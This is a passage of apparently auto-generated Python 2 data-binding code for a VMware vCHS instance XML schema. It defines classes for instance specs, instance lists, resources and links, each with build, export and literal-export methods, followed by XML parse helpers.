def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class InstanceSpecParamsType(GeneratedsSuper):
"""5.7 Input parameters for creation of instance. Requires details like
service group id, plan id, name of the instance, etc."""
subclass = None
superclass = None
def __init__(self, name=None, description=None, planId=None, serviceGroupId=None, instanceSpec=None, instanceDefaultSpec=None, bindingSpec=None):
self.original_tagname_ = None
self.name = name
self.description = description
self.planId = planId
self.serviceGroupId = serviceGroupId
self.instanceSpec = instanceSpec
self.instanceDefaultSpec = instanceDefaultSpec
self.bindingSpec = bindingSpec
def factory(*args_, **kwargs_):
if InstanceSpecParamsType.subclass:
return InstanceSpecParamsType.subclass(*args_, **kwargs_)
else:
return InstanceSpecParamsType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_name(self): return self.name
def set_name(self, name): self.name = name
def get_description(self): return self.description
def set_description(self, description): self.description = description
def get_planId(self): return self.planId
def set_planId(self, planId): self.planId = planId
def get_serviceGroupId(self): return self.serviceGroupId
def set_serviceGroupId(self, serviceGroupId): self.serviceGroupId = serviceGroupId
def get_instanceSpec(self): return self.instanceSpec
def set_instanceSpec(self, instanceSpec): self.instanceSpec = instanceSpec
def get_instanceDefaultSpec(self): return self.instanceDefaultSpec
def set_instanceDefaultSpec(self, instanceDefaultSpec): self.instanceDefaultSpec = instanceDefaultSpec
def get_bindingSpec(self): return self.bindingSpec
def set_bindingSpec(self, bindingSpec): self.bindingSpec = bindingSpec
def validate_NonEmptyString(self, value):
# Validate type NonEmptyString, a restriction on xs:string.
pass
def hasContent_(self):
if (
self.name is not None or
self.description is not None or
self.planId is not None or
self.serviceGroupId is not None or
self.instanceSpec is not None or
self.instanceDefaultSpec is not None or
self.bindingSpec is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='instance:', name_='InstanceSpecParamsType', namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1" xmlns:common="http://www.vmware.com/vchs/sc/common/v1" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='InstanceSpecParamsType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='instance:', name_='InstanceSpecParamsType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='instance:', name_='InstanceSpecParamsType'):
pass
def exportChildren(self, outfile, level, namespace_='instance:', name_='InstanceSpecParamsType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.name is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sname>%s</%sname>%s' % (namespace_, self.gds_format_string(quote_xml(self.name).encode(ExternalEncoding), input_name='name'), namespace_, eol_))
if self.description is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sdescription>%s</%sdescription>%s' % (namespace_, self.gds_format_string(quote_xml(self.description).encode(ExternalEncoding), input_name='description'), namespace_, eol_))
if self.planId is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%splanId>%s</%splanId>%s' % (namespace_, self.gds_format_string(quote_xml(self.planId).encode(ExternalEncoding), input_name='planId'), namespace_, eol_))
if self.serviceGroupId is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sserviceGroupId>%s</%sserviceGroupId>%s' % (namespace_, self.gds_format_string(quote_xml(self.serviceGroupId).encode(ExternalEncoding), input_name='serviceGroupId'), namespace_, eol_))
if self.instanceSpec is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sinstanceSpec>%s</%sinstanceSpec>%s' % (namespace_, self.gds_format_string(quote_xml(self.instanceSpec).encode(ExternalEncoding), input_name='instanceSpec'), namespace_, eol_))
if self.instanceDefaultSpec is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sinstanceDefaultSpec>%s</%sinstanceDefaultSpec>%s' % (namespace_, self.gds_format_string(quote_xml(self.instanceDefaultSpec).encode(ExternalEncoding), input_name='instanceDefaultSpec'), namespace_, eol_))
if self.bindingSpec is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sbindingSpec>%s</%sbindingSpec>%s' % (namespace_, self.gds_format_string(quote_xml(self.bindingSpec).encode(ExternalEncoding), input_name='bindingSpec'), namespace_, eol_))
def exportLiteral(self, outfile, level, name_='InstanceSpecParamsType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
if self.name is not None:
showIndent(outfile, level)
outfile.write('name=%s,\n' % quote_python(self.name).encode(ExternalEncoding))
if self.description is not None:
showIndent(outfile, level)
outfile.write('description=%s,\n' % quote_python(self.description).encode(ExternalEncoding))
if self.planId is not None:
showIndent(outfile, level)
outfile.write('planId=%s,\n' % quote_python(self.planId).encode(ExternalEncoding))
if self.serviceGroupId is not None:
showIndent(outfile, level)
outfile.write('serviceGroupId=%s,\n' % quote_python(self.serviceGroupId).encode(ExternalEncoding))
if self.instanceSpec is not None:
showIndent(outfile, level)
outfile.write('instanceSpec=%s,\n' % quote_python(self.instanceSpec).encode(ExternalEncoding))
if self.instanceDefaultSpec is not None:
showIndent(outfile, level)
outfile.write('instanceDefaultSpec=%s,\n' % quote_python(self.instanceDefaultSpec).encode(ExternalEncoding))
if self.bindingSpec is not None:
showIndent(outfile, level)
outfile.write('bindingSpec=%s,\n' % quote_python(self.bindingSpec).encode(ExternalEncoding))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'name':
name_ = child_.text
name_ = self.gds_validate_string(name_, node, 'name')
self.name = name_
self.validate_NonEmptyString(self.name) # validate type NonEmptyString
elif nodeName_ == 'description':
description_ = child_.text
description_ = self.gds_validate_string(description_, node, 'description')
self.description = description_
self.validate_NonEmptyString(self.description) # validate type NonEmptyString
elif nodeName_ == 'planId':
planId_ = child_.text
planId_ = self.gds_validate_string(planId_, node, 'planId')
self.planId = planId_
self.validate_NonEmptyString(self.planId) # validate type NonEmptyString
elif nodeName_ == 'serviceGroupId':
serviceGroupId_ = child_.text
serviceGroupId_ = self.gds_validate_string(serviceGroupId_, node, 'serviceGroupId')
self.serviceGroupId = serviceGroupId_
self.validate_NonEmptyString(self.serviceGroupId) # validate type NonEmptyString
elif nodeName_ == 'instanceSpec':
instanceSpec_ = child_.text
instanceSpec_ = self.gds_validate_string(instanceSpec_, node, 'instanceSpec')
self.instanceSpec = instanceSpec_
self.validate_NonEmptyString(self.instanceSpec) # validate type NonEmptyString
elif nodeName_ == 'instanceDefaultSpec':
instanceDefaultSpec_ = child_.text
instanceDefaultSpec_ = self.gds_validate_string(instanceDefaultSpec_, node, 'instanceDefaultSpec')
self.instanceDefaultSpec = instanceDefaultSpec_
self.validate_NonEmptyString(self.instanceDefaultSpec) # validate type NonEmptyString
elif nodeName_ == 'bindingSpec':
bindingSpec_ = child_.text
bindingSpec_ = self.gds_validate_string(bindingSpec_, node, 'bindingSpec')
self.bindingSpec = bindingSpec_
self.validate_NonEmptyString(self.bindingSpec) # validate type NonEmptyString
# end class InstanceSpecParamsType
class InstanceListType(GeneratedsSuper):
"""5.7 Represents list of vCHS instances."""
subclass = None
superclass = None
def __init__(self, instances=None):
self.original_tagname_ = None
if instances is None:
self.instances = []
else:
self.instances = instances
def factory(*args_, **kwargs_):
if InstanceListType.subclass:
return InstanceListType.subclass(*args_, **kwargs_)
else:
return InstanceListType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_instances(self): return self.instances
def set_instances(self, instances): self.instances = instances
def add_instances(self, value): self.instances.append(value)
def insert_instances_at(self, index, value): self.instances.insert(index, value)
def replace_instances_at(self, index, value): self.instances[index] = value
def hasContent_(self):
if (
self.instances
):
return True
else:
return False
def export(self, outfile, level, namespace_='instance:', name_='InstanceListType', namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='InstanceListType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='instance:', name_='InstanceListType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='instance:', name_='InstanceListType'):
pass
def exportChildren(self, outfile, level, namespace_='instance:', name_='InstanceListType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for instances_ in self.instances:
instances_.export(outfile, level, namespace_, name_='instances', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='InstanceListType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
pass
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('instances=[\n')
level += 1
for instances_ in self.instances:
showIndent(outfile, level)
outfile.write('model_.InstanceType(\n')
instances_.exportLiteral(outfile, level, name_='InstanceType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'instances':
obj_ = InstanceType.factory()
obj_.build(child_)
self.instances.append(obj_)
obj_.original_tagname_ = 'instances'
# end class InstanceListType
class ResourceType(GeneratedsSuper):
"""The resource identifier.The value of this attribute uniquely
identifies the resource, persists for the life of the entity,
and is never reused. Contains the name of the the entity."""
subclass = None
superclass = None
def __init__(self, id=None, name=None, link=None, extensiontype_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.name = _cast(None, name)
if link is None:
self.link = []
else:
self.link = link
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if ResourceType.subclass:
return ResourceType.subclass(*args_, **kwargs_)
else:
return ResourceType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_link(self): return self.link
def set_link(self, link): self.link = link
def add_link(self, value): self.link.append(value)
def insert_link_at(self, index, value): self.link.insert(index, value)
def replace_link_at(self, index, value): self.link[index] = value
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_name(self): return self.name
def set_name(self, name): self.name = name
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
self.link
):
return True
else:
return False
def export(self, outfile, level, namespace_='instance:', name_='ResourceType', namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1" xmlns:common="http://www.vmware.com/vchs/sc/common/v1" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='ResourceType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='instance:', name_='ResourceType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='instance:', name_='ResourceType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.name is not None and 'name' not in already_processed:
already_processed.add('name')
outfile.write(' name=%s' % (quote_attrib(self.name), ))
if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
outfile.write(' xsi:type="%s"' % self.extensiontype_)
def exportChildren(self, outfile, level, namespace_='instance:', name_='ResourceType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for link_ in self.link:
link_.export(outfile, level, namespace_, name_='link', pretty_print=pretty_print)
def exportLiteral(self, outfile, level, name_='ResourceType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
showIndent(outfile, level)
outfile.write('id=%s,\n' % (self.id,))
if self.name is not None and 'name' not in already_processed:
already_processed.add('name')
showIndent(outfile, level)
outfile.write('name=%s,\n' % (self.name,))
def exportLiteralChildren(self, outfile, level, name_):
showIndent(outfile, level)
outfile.write('link=[\n')
level += 1
for link_ in self.link:
showIndent(outfile, level)
outfile.write('model_.LinkType(\n')
link_.exportLiteral(outfile, level, name_='LinkType')
showIndent(outfile, level)
outfile.write('),\n')
level -= 1
showIndent(outfile, level)
outfile.write('],\n')
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.add('name')
self.name = value
value = find_attr_value_('xsi:type', node)
if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'link':
obj_ = LinkType.factory()
obj_.build(child_)
self.link.append(obj_)
obj_.original_tagname_ = 'link'
# end class ResourceType
class LinkType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, href=None, type_=None, id=None, rel=None, name=None):
self.original_tagname_ = None
self.href = _cast(None, href)
self.type_ = _cast(None, type_)
self.id = _cast(None, id)
self.rel = _cast(None, rel)
self.name = _cast(None, name)
def factory(*args_, **kwargs_):
if LinkType.subclass:
return LinkType.subclass(*args_, **kwargs_)
else:
return LinkType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_href(self): return self.href
def set_href(self, href): self.href = href
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_rel(self): return self.rel
def set_rel(self, rel): self.rel = rel
def get_name(self): return self.name
def set_name(self, name): self.name = name
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespace_='instance:', name_='LinkType', namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='LinkType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='instance:', name_='LinkType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='instance:', name_='LinkType'):
if self.href is not None and 'href' not in already_processed:
already_processed.add('href')
outfile.write(' href=%s' % (self.gds_format_string(quote_attrib(self.href).encode(ExternalEncoding), input_name='href'), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (quote_attrib(self.type_), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.rel is not None and 'rel' not in already_processed:
already_processed.add('rel')
outfile.write(' rel=%s' % (quote_attrib(self.rel), ))
if self.name is not None and 'name' not in already_processed:
already_processed.add('name')
outfile.write(' name=%s' % (quote_attrib(self.name), ))
def exportChildren(self, outfile, level, namespace_='instance:', name_='LinkType', fromsubclass_=False, pretty_print=True):
pass
def exportLiteral(self, outfile, level, name_='LinkType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
if self.href is not None and 'href' not in already_processed:
already_processed.add('href')
showIndent(outfile, level)
outfile.write('href="%s",\n' % (self.href,))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
showIndent(outfile, level)
outfile.write('type_=%s,\n' % (self.type_,))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
showIndent(outfile, level)
outfile.write('id=%s,\n' % (self.id,))
if self.rel is not None and 'rel' not in already_processed:
already_processed.add('rel')
showIndent(outfile, level)
outfile.write('rel=%s,\n' % (self.rel,))
if self.name is not None and 'name' not in already_processed:
already_processed.add('name')
showIndent(outfile, level)
outfile.write('name=%s,\n' % (self.name,))
def exportLiteralChildren(self, outfile, level, name_):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('href', node)
if value is not None and 'href' not in already_processed:
already_processed.add('href')
self.href = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('rel', node)
if value is not None and 'rel' not in already_processed:
already_processed.add('rel')
self.rel = value
value = find_attr_value_('name', node)
if value is not None and 'name' not in already_processed:
already_processed.add('name')
self.name = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class LinkType
class InstanceType(ResourceType):
"""5.7 Provides the details of the instance. Includes details like id
of the instance, Api endpoint of the instance, service group id
of the instance, service plan id used to create the instance,
etc."""
subclass = None
superclass = ResourceType
def __init__(self, id=None, name=None, link=None, description=None, region=None, instanceVersion=None, planId=None, serviceGroupId=None, apiUrl=None, dashboardUrl=None, instanceAttributes=None):
self.original_tagname_ = None
super(InstanceType, self).__init__(id, name, link, )
self.description = description
self.region = region
self.instanceVersion = instanceVersion
self.planId = planId
self.serviceGroupId = serviceGroupId
self.apiUrl = apiUrl
self.dashboardUrl = dashboardUrl
self.instanceAttributes = instanceAttributes
def factory(*args_, **kwargs_):
if InstanceType.subclass:
return InstanceType.subclass(*args_, **kwargs_)
else:
return InstanceType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_description(self): return self.description
def set_description(self, description): self.description = description
def get_region(self): return self.region
def set_region(self, region): self.region = region
def get_instanceVersion(self): return self.instanceVersion
def set_instanceVersion(self, instanceVersion): self.instanceVersion = instanceVersion
def get_planId(self): return self.planId
def set_planId(self, planId): self.planId = planId
def get_serviceGroupId(self): return self.serviceGroupId
def set_serviceGroupId(self, serviceGroupId): self.serviceGroupId = serviceGroupId
def get_apiUrl(self): return self.apiUrl
def set_apiUrl(self, apiUrl): self.apiUrl = apiUrl
def get_dashboardUrl(self): return self.dashboardUrl
def set_dashboardUrl(self, dashboardUrl): self.dashboardUrl = dashboardUrl
def get_instanceAttributes(self): return self.instanceAttributes
def set_instanceAttributes(self, instanceAttributes): self.instanceAttributes = instanceAttributes
def validate_NonEmptyString(self, value):
# Validate type NonEmptyString, a restriction on xs:string.
pass
def hasContent_(self):
if (
self.description is not None or
self.region is not None or
self.instanceVersion is not None or
self.planId is not None or
self.serviceGroupId is not None or
self.apiUrl is not None or
self.dashboardUrl is not None or
self.instanceAttributes is not None or
super(InstanceType, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='instance:', name_='InstanceType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='InstanceType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='instance:', name_='InstanceType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='instance:', name_='InstanceType'):
super(InstanceType, self).exportAttributes(outfile, level, already_processed, namespace_, name_='InstanceType')
def exportChildren(self, outfile, level, namespace_='instance:', name_='InstanceType', fromsubclass_=False, pretty_print=True):
super(InstanceType, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.description is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sdescription>%s</%sdescription>%s' % (namespace_, self.gds_format_string(quote_xml(self.description).encode(ExternalEncoding), input_name='description'), namespace_, eol_))
if self.region is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sregion>%s</%sregion>%s' % (namespace_, self.gds_format_string(quote_xml(self.region).encode(ExternalEncoding), input_name='region'), namespace_, eol_))
if self.instanceVersion is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sinstanceVersion>%s</%sinstanceVersion>%s' % (namespace_, self.gds_format_string(quote_xml(self.instanceVersion).encode(ExternalEncoding), input_name='instanceVersion'), namespace_, eol_))
if self.planId is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%splanId>%s</%splanId>%s' % (namespace_, self.gds_format_string(quote_xml(self.planId).encode(ExternalEncoding), input_name='planId'), namespace_, eol_))
if self.serviceGroupId is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sserviceGroupId>%s</%sserviceGroupId>%s' % (namespace_, self.gds_format_string(quote_xml(self.serviceGroupId).encode(ExternalEncoding), input_name='serviceGroupId'), namespace_, eol_))
if self.apiUrl is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sapiUrl>%s</%sapiUrl>%s' % (namespace_, self.gds_format_string(quote_xml(self.apiUrl).encode(ExternalEncoding), input_name='apiUrl'), namespace_, eol_))
if self.dashboardUrl is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sdashboardUrl>%s</%sdashboardUrl>%s' % (namespace_, self.gds_format_string(quote_xml(self.dashboardUrl).encode(ExternalEncoding), input_name='dashboardUrl'), namespace_, eol_))
if self.instanceAttributes is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sinstanceAttributes>%s</%sinstanceAttributes>%s' % (namespace_, self.gds_format_string(quote_xml(self.instanceAttributes).encode(ExternalEncoding), input_name='instanceAttributes'), namespace_, eol_))
def exportLiteral(self, outfile, level, name_='InstanceType'):
level += 1
already_processed = set()
self.exportLiteralAttributes(outfile, level, already_processed, name_)
if self.hasContent_():
self.exportLiteralChildren(outfile, level, name_)
def exportLiteralAttributes(self, outfile, level, already_processed, name_):
super(InstanceType, self).exportLiteralAttributes(outfile, level, already_processed, name_)
def exportLiteralChildren(self, outfile, level, name_):
super(InstanceType, self).exportLiteralChildren(outfile, level, name_)
if self.description is not None:
showIndent(outfile, level)
outfile.write('description=%s,\n' % quote_python(self.description).encode(ExternalEncoding))
if self.region is not None:
showIndent(outfile, level)
outfile.write('region=%s,\n' % quote_python(self.region).encode(ExternalEncoding))
if self.instanceVersion is not None:
showIndent(outfile, level)
outfile.write('instanceVersion=%s,\n' % quote_python(self.instanceVersion).encode(ExternalEncoding))
if self.planId is not None:
showIndent(outfile, level)
outfile.write('planId=%s,\n' % quote_python(self.planId).encode(ExternalEncoding))
if self.serviceGroupId is not None:
showIndent(outfile, level)
outfile.write('serviceGroupId=%s,\n' % quote_python(self.serviceGroupId).encode(ExternalEncoding))
if self.apiUrl is not None:
showIndent(outfile, level)
outfile.write('apiUrl=%s,\n' % quote_python(self.apiUrl).encode(ExternalEncoding))
if self.dashboardUrl is not None:
showIndent(outfile, level)
outfile.write('dashboardUrl=%s,\n' % quote_python(self.dashboardUrl).encode(ExternalEncoding))
if self.instanceAttributes is not None:
showIndent(outfile, level)
outfile.write('instanceAttributes=%s,\n' % quote_python(self.instanceAttributes).encode(ExternalEncoding))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(InstanceType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'description':
description_ = child_.text
description_ = self.gds_validate_string(description_, node, 'description')
self.description = description_
self.validate_NonEmptyString(self.description) # validate type NonEmptyString
elif nodeName_ == 'region':
region_ = child_.text
region_ = self.gds_validate_string(region_, node, 'region')
self.region = region_
self.validate_NonEmptyString(self.region) # validate type NonEmptyString
elif nodeName_ == 'instanceVersion':
instanceVersion_ = child_.text
instanceVersion_ = self.gds_validate_string(instanceVersion_, node, 'instanceVersion')
self.instanceVersion = instanceVersion_
self.validate_NonEmptyString(self.instanceVersion) # validate type NonEmptyString
elif nodeName_ == 'planId':
planId_ = child_.text
planId_ = self.gds_validate_string(planId_, node, 'planId')
self.planId = planId_
self.validate_NonEmptyString(self.planId) # validate type NonEmptyString
elif nodeName_ == 'serviceGroupId':
serviceGroupId_ = child_.text
serviceGroupId_ = self.gds_validate_string(serviceGroupId_, node, 'serviceGroupId')
self.serviceGroupId = serviceGroupId_
self.validate_NonEmptyString(self.serviceGroupId) # validate type NonEmptyString
elif nodeName_ == 'apiUrl':
apiUrl_ = child_.text
apiUrl_ = self.gds_validate_string(apiUrl_, node, 'apiUrl')
self.apiUrl = apiUrl_
elif nodeName_ == 'dashboardUrl':
dashboardUrl_ = child_.text
dashboardUrl_ = self.gds_validate_string(dashboardUrl_, node, 'dashboardUrl')
self.dashboardUrl = dashboardUrl_
elif nodeName_ == 'instanceAttributes':
instanceAttributes_ = child_.text
instanceAttributes_ = self.gds_validate_string(instanceAttributes_, node, 'instanceAttributes')
self.instanceAttributes = instanceAttributes_
self.validate_NonEmptyString(self.instanceAttributes) # validate type NonEmptyString
super(InstanceType, self).buildChildren(child_, node, nodeName_, True)
# end class InstanceType
GDSClassesMapping = {
'Resource': ResourceType,
'instances': InstanceType,
'InstanceList': InstanceListType,
'Instance': InstanceType,
'link': LinkType,
'Link': LinkType,
'InstanceSpecParams': InstanceSpecParamsType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print USAGE_TEXT
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName, silence=False):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'InstanceSpecParamsType'
rootClass = InstanceSpecParamsType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1"',
pretty_print=True)
return rootObj
def parseEtree(inFileName, silence=False):
doc = parsexml_(inFileName)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'InstanceSpecParamsType'
rootClass = InstanceSpecParamsType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
mapping = {}
rootElement = rootObj.to_etree(None, name_=rootTag, mapping_=mapping)
reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
if not silence:
content = etree_.tostring(
rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString, silence=False):
from StringIO import StringIO
doc = parsexml_(StringIO(inString))
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
